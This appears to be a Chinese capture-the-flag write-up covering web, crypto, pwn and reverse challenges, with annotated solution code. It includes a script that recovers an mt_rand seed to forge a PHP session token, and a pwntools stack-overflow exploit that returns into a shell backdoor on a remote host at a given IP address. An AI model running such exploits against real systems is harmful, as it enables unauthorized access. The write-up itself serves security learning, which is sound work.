-

很可惜有一道逆向就差一点解出来

Web

web1

访问robots.txt

image-20240629093445501

然后访问 /robot-nurses 再下拉到最后一行

image-20240629093459287

web4

访问 robots.txt

<?php
// Challenge source (web4) as shown on the page; the seed literal is
// presumably masked in this listing.
include 'flag.php';
session_start();
// One fixed seed for every visitor: mt_srand() below will therefore replay
// the same mt_rand() sequence on every request, so the "random" token is
// fully determined by this value.
$_SESSION['seed']='xxxxxxxxxxxxxxxxx';

// Build a 20-character token from the session seed, store it in the session
// and reveal its first 10 characters.
// Why this is recoverable: mt_srand() is re-seeded with the same value on
// every call, so the whole token is a pure function of the seed. The 10
// leaked characters pin 10 consecutive mt_rand() outputs, which is enough to
// recover the seed offline and regenerate the hidden second half (the
// writeup below does exactly that). A CSPRNG such as random_int() /
// random_bytes() with no user-visible prefix would remove the weakness.
function createToken(){
    mt_srand($_SESSION['seed']);
    $dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $token = '';
    // 20 draws of mt_rand(0, 61); each draw picks one alphabet character
    for ( $i = 0; $i <20; $i++ ){
        $token .= substr($dic,mt_rand(0, strlen($dic) - 1), 1);
    }

    $_SESSION['token']=$token;
    // Only the first half is echoed; the echoed text is mojibake in this
    // listing (page encoding) and is kept byte-for-byte.
    $top10=substr($token,0,10);
    echo '<p class="p1">Generate token successfully</p><p class="p2">鎻愮ず锛氭偍鐨勪护鐗屽墠10浣嶄负锛�'.$top10.'</p>';
}
createToken();
// Token check. The comparison is PHP's loose ==: when both operands are
// numeric-looking strings they are compared as numbers, so a strict ===
// or, better, hash_equals() is the safe form for a secret comparison.
// The user-facing strings are mojibake in this listing and kept as-is.
if(isset($_POST['token'])){
    if($_POST['token']==$_SESSION['token']){
        echo '<p class="p2">浠ょ墝楠岃瘉鎴愬姛锛岃繖鏄綘鎯宠鐨勶細'.$flag.'</p>';
    }else{
        echo '<p class="p2">浠ょ墝楠岃瘉澶辫触</p>';
    }
}
?>

一眼 GWCTF 2019 WEB-枯燥的抽奖,搜一下题解 [GWCTF 2019 WEB-枯燥的抽奖_gwctf 2019]枯燥的抽奖 1-CSDN博客

先得出随机值

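str1 = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2 = 'R9WLuE5hGV'


def mt_seed_constraints(leaked, alphabet):
    """Turn a leaked token prefix into a seed-recovery constraint string.

    Each leaked character is mapped to its index in *alphabet* and written
    as ``"<idx> <idx> 0 <len(alphabet)-1> "``: the value ``mt_rand()`` must
    have returned (given twice, as a min/max pair) followed by the range it
    was called with (``mt_rand(0, strlen($dic) - 1)`` in the challenge).
    This is the per-output constraint format of the seed-recovery tool used
    in the writeup (presumably php_mt_seed); the trailing space of the
    original output is preserved.

    Args:
        leaked: the token characters the page revealed (first 10 here).
        alphabet: the ``$dic`` string the PHP side indexes into.

    Returns:
        The space-terminated constraint string; empty for empty *leaked*.

    Raises:
        ValueError: if a leaked character is not in *alphabet*. The original
            nested loop silently dropped such characters, which shifts every
            following constraint and yields a wrong or missing seed.
    """
    upper = len(alphabet) - 1  # loop-invariant upper bound of mt_rand()
    parts = []
    for ch in leaked:
        idx = alphabet.find(ch)
        if idx < 0:
            raise ValueError(f"{ch!r} is not in the token alphabet")
        parts.append(f"{idx} {idx} 0 {upper} ")
    return ''.join(parts)


res = mt_seed_constraints(str2, str1)
print(res)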

得到种子

image-20240629110956158

POC:

<?php
// Regenerate the challenge token from the recovered seed.
// mt_srand() with a known seed makes every following mt_rand() value
// deterministic, so replaying the same 20 draws over the same alphabet
// reproduces the full token, including the 10 characters never shown.
$seed = 2107153532;
mt_srand($seed);
$dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$last = strlen($dic) - 1;
$chars = [];
for ($i = 0; $i < 20; $i++) {
    $chars[] = $dic[mt_rand(0, $last)];
}
echo implode('', $chars);
?>

得到 token

image-20240629111103310

填入得到 flag

image-20240629111122945

Crypto

crypto1

png 提示为 hill 加密,010 打开 png 得到密文 CLYCOEXMAYHD。然后 hill 解密

image-20240629123326172

Pwn

pwn1

在 vul 函数处发现栈溢出点

image-20240629100617628

存在后门函数 get_shell

image-20240629100635962

POC:

from pwn import *
from LibcSearcher import *

def s(a):
    """Send *a* to the target over the module-level ``io`` (no newline)."""
    io.send(a)
def sa(a, b):
    """Wait until *a* is received, then send *b* (no newline)."""
    io.sendafter(a, b)
def sl(a):
    """Send *a* followed by a newline."""
    io.sendline(a)
def sla(a, b):
    """Wait until *a* is received, then send *b* followed by a newline."""
    io.sendlineafter(a, b)
def r():
    """Return whatever bytes are currently available from the target."""
    return io.recv()
def pr():
    """Print the bytes currently available from the target (debug aid)."""
    print(io.recv())
def rl(a):
    """Read and return everything up to and including delimiter *a*."""
    return io.recvuntil(a)
def inter():
    """Hand the connection over to the user (interactive terminal)."""
    io.interactive()
def debug():
    """Attach gdb to the running target and pause until the user continues.

    Only meaningful for a local ``process()``; ``io`` is a ``remote()`` in
    this script, so this helper is unused here.
    """
    gdb.attach(io)
    pause()
def get_64addr():
    """Read up to the next 0x7f byte and decode the last 6 bytes as a u64.

    The 6 bytes are zero-padded to 8 before unpacking; ``u64`` uses the
    endianness of the pwntools context set later in this script.
    Unused in this exploit (kept from the author's template).
    """
    return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_32addr():
    """Read up to the next 0xf7 byte and decode the last 4 bytes as a u32.

    32-bit counterpart of ``get_64addr``; unused in this exploit.
    """
    return u32(io.recvuntil(b'\xf7')[-4:])
def get_64sb():
    """Return ``(system, "/bin/sh")`` addresses rebased on ``libc_base``.

    Relies on module globals ``libc_base`` and ``libc`` (an ``ELF``) that
    are never defined in this script — calling it here raises NameError.
    Unused in this exploit.
    """
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def get_32sb():
    """Same as ``get_64sb`` — the body is identical, nothing is 32-bit
    specific. Depends on undefined globals ``libc_base``/``libc``; unused.
    """
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def get_64sb_libcsearch():
    """LibcSearcher variant of ``get_64sb``: offsets come from ``libc.dump``.

    Here ``libc`` must be a ``LibcSearcher`` object, not a pwntools ``ELF``;
    neither it nor ``libc_base`` is defined in this script. Unused.
    """
    return libc_base + libc.dump('system'), libc_base + libc.dump('str_bin_sh')
def get_32sb_libcsearch():
    """Identical to ``get_64sb_libcsearch`` (no 32-bit specific logic).

    Depends on undefined globals ``libc_base``/``libc``; unused here.
    """
    return libc_base + libc.dump('system'), libc_base + libc.dump('str_bin_sh')

# context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
# io = process('./pwn')
elf = ELF('./pwn')
# The helpers above all reference this module-level connection.
io = remote("111.74.9.131",10309)

# Distance from the start of vul()'s buffer to the saved return address:
# 0x30 bytes of buffer plus 8 bytes of saved rbp. The 0x30 comes from the
# vul() disassembly shown in the writeup, not from anything in this script.
padding = 0x30 + 8
# Address of the get_shell backdoor from the writeup's screenshot. A fixed
# code address only works if the binary is not PIE, and a plain return-
# address overwrite only works without a stack canary — checksec output
# is not shown, so both are assumed rather than verified here.
sh = 0x4008D0

# flat() concatenates the filler and packs `sh` per the amd64 context.
payload = flat([padding*b'a'],sh)
sl(payload)

inter()

image-20240629100742645

Re

Re2

查看主函数,发现有两个逻辑处理

1.

image-20240629135505660

输入的 flag 和 0x7FF7B9AE3020 地址处的进行异或

2.

image-20240629135626336

v31 处以 0x7FF7B9AE30A0 处的值作为下标，并把 flag 的值赋予给它

然后要求所得值为 “23gJba3au9mnk3c10:0zp8qJr41H39jp”,编写 POC

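en = [0x00000053, 0x00000045, 0x0000005C, 0x0000001E, 0x00000050, 0x00000013,0x0000002F, 0x00000078, 0x00000004, 0x00000053, 0x00000058,0x0000004A, 0x00000043, 0x00000001, 0x00000041, 0x0000002A,0x00000008,
0x00000040, 0x00000067, 0x0000002F, 0x0000000C, 0x0000004A, 0x00000012, 0x0000002E,0x00000041, 0x0000006C, 0x00000005, 0x00000054, 0x00000040, 0x00000012, 0x0000005B, 0x0000004F]

print(len(en))

v = [0x00000004, 0x0000000F, 0x0000000B, 0x0000001E, 0x0000000E, 0x00000014, 0x0000001F, 0x00000009, 0x00000017, 0x00000002, 0x00000019, 0x0000001C, 0x00000012, 0x00000010, 0x00000000, 0x00000008, 0x00000011, 0x00000001, 0x00000015, 0x00000003, 0x0000000A, 0x0000001D, 0x0000000C, 0x00000016, 0x00000018, 0x0000000D, 0x0000001B, 0x00000005, 0x00000007, 0x00000006, 0x00000013, 0x0000001A]
print(len(v))

strs = "23gJba3au9mnk3c10:0zp8qJr41H39jp"


def recover_flag(xor_key, perm, target):
    """Undo the binary's XOR-then-scatter transform and return the flag.

    Per the writeup, the binary XORs input byte ``i`` with ``xor_key[i]``
    and stores the result at index ``perm[i]`` of a buffer that must equal
    *target*. Inverting that gives ``flag[i] = target[perm[i]] ^ xor_key[i]``.

    Args:
        xor_key: per-position XOR bytes dumped from the binary.
        perm: destination index of each input position.
        target: the string the binary compares the result against.

    Returns:
        The recovered flag as ``str``.

    Raises:
        ValueError: if ``len(perm) != len(xor_key)`` or a ``perm`` entry is
            outside *target*. The original loops would either raise a bare
            IndexError or silently truncate to the shorter list, both of
            which hide a bad memory dump.
    """
    if len(perm) != len(xor_key):
        raise ValueError(f"perm has {len(perm)} entries, xor_key has {len(xor_key)}")
    if any(not 0 <= i < len(target) for i in perm):
        raise ValueError("perm index outside target string")
    return ''.join(chr(ord(target[i]) ^ k) for i, k in zip(perm, xor_key))


# Original printed one character at a time with end=""; same output here.
print(recover_flag(en, v, strs), end="")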

得到 flag

image-20240629135837993